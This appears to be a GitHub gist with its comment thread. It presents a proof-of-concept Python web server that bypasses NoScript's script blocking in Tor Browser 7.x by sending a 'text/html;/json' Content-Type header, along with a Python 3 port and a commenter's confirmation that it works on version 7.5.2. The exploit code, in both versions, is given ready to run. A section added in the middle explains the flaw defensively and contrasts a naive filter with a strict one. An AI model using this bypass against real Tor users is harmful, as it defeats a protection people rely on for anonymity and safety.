Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
#!/usr/bin/python
# Python 2 PoC: serve an HTML page whose Content-Type carries a junk ";/json"
# suffix. Point Tor Browser 7.x (NoScript "Safest") at http://<host>:31337/.
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

PORT_NUMBER = 31337


class myHandler(BaseHTTPRequestHandler):
    # Handler for the GET requests
    def do_GET(self):
        self.send_response(200)
        # Here is where the magic happens: the ";/json" tail is what gets the
        # inline script past NoScript, while the browser still parses the
        # body as text/html and executes the <script> block.
        self.send_header('Content-type', 'text/html;/json')
        self.end_headers()
        self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
        return


try:
    server = HTTPServer(('', PORT_NUMBER), myHandler)
    print 'Started httpserver on port ', PORT_NUMBER
    server.serve_forever()
except KeyboardInterrupt:
    print '^C received, shutting down the web server'
    server.socket.close()
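The only thing the PoC changes is the Content-Type header, so the interesting question for a defender is how a content filter decides what a response is. The following is an added example, not code from the gist and not NoScript's actual logic: the "naive" filter is an assumed stand-in for any check that inspects the raw header string for a JSON-looking token, while the "strict" filter first reduces the header to its MIME essence (type/subtype, parameters dropped) the way a browser does and only then decides whether script blocking applies. The sample headers are constructed.

```python
"""Why 'text/html;/json' must be judged on its parsed essence, not the raw string.

Added illustration (not the gist's code, not NoScript's implementation).
naive_blocks_script() is a hypothetical loose check; strict_blocks_script()
shows the parse-then-decide approach that closes this class of confusion.
"""
from email.message import Message

# Essence types in which a browser executes inline script when the response
# is loaded as a top-level document.
SCRIPT_CAPABLE = {"text/html", "application/xhtml+xml", "image/svg+xml"}

# Constructed sample headers (not captured traffic).
SAMPLE_HEADERS = [
    "text/html",
    "text/html; charset=utf-8",
    "text/html;/json",                 # the gist's trick: HTML plus a junk parameter
    "text/html;charset=utf-8;/json",   # same trick with a real parameter in front
    "application/json",
    "application/json; charset=utf-8",
    "nonsense",                        # unparsable: stdlib falls back to text/plain
]


def mime_essence(content_type):
    """Return the lowercased 'type/subtype' of a Content-Type value, ignoring
    everything after the first ';' (parameters), via the stdlib email parser."""
    msg = Message()
    msg["Content-Type"] = content_type
    return msg.get_content_type()   # 'text/plain' when the value is not type/subtype


def naive_blocks_script(content_type):
    """Hypothetical loose filter (an assumption for illustration): if the raw
    header mentions '/json' anywhere, the response is classified as inert data
    and script blocking is skipped. 'text/html;/json' is therefore NOT blocked."""
    looks_like_json = "/json" in content_type.lower()
    return not looks_like_json


def strict_blocks_script(content_type):
    """Correct filter: block exactly when the parsed essence is a type the
    browser will execute script in. Parameters cannot influence the verdict."""
    return mime_essence(content_type) in SCRIPT_CAPABLE


def classify_all(headers=SAMPLE_HEADERS):
    """Map each header to (naive_blocks, strict_blocks) so divergences are visible."""
    return {h: (naive_blocks_script(h), strict_blocks_script(h)) for h in headers}


if __name__ == "__main__":
    for header, (naive, strict) in classify_all().items():
        flag = "  <-- bypass: browser runs script, naive filter stood down" if strict and not naive else ""
        print("%-34r naive_blocks=%-5s strict_blocks=%-5s%s" % (header, naive, strict, flag))
```

Run it and the two filters agree on every header except the ones carrying ";/json" after an HTML essence, which is precisely the shape the PoC server emits. The general lesson is that any allow/deny decision keyed on Content-Type must be taken on the same parsed value the browser acts on, never on a substring or regex over the raw header.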
sparskakyl commented Sep 10, 2018

2 hacky wacky 4 me

brammittendorff commented Sep 10, 2018

Python3 version:

#!/usr/bin/env python3
# Python 3 port of the PoC above: same server, same Content-Type trick.
from http.server import BaseHTTPRequestHandler, HTTPServer

PORT_NUMBER = 31337


class myHandler(BaseHTTPRequestHandler):
    # Handler for the GET requests
    def do_GET(self):
        self.send_response(200)
        # Here is where the magic happens: keep the ";/json" suffix intact,
        # a plain 'text/html' header does not trigger the bypass.
        self.send_header('Content-type', 'text/html;/json')
        self.end_headers()
        # wfile expects bytes in Python 3, hence the .encode()
        self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>".encode())
        return


try:
    server = HTTPServer(('', PORT_NUMBER), myHandler)
    print('Started httpserver on port %s' % PORT_NUMBER)
    server.serve_forever()
except KeyboardInterrupt:
    print('^C received, shutting down the web server')
    server.socket.close()
jorgeluengar commented Jun 10, 2019

@brammittendorff many thanks in advance for the Python3 version, but there is a small mistake regarding the exploit:
It must use:
self.send_header('Content-type','text/html;/json')
instead of
self.send_header('Content-type','text/html')

Tested on Tor 7.5.2

Thanks!

brammittendorff commented Jun 11, 2019

@jorgeluengar you are right, fixed my comment thanks!
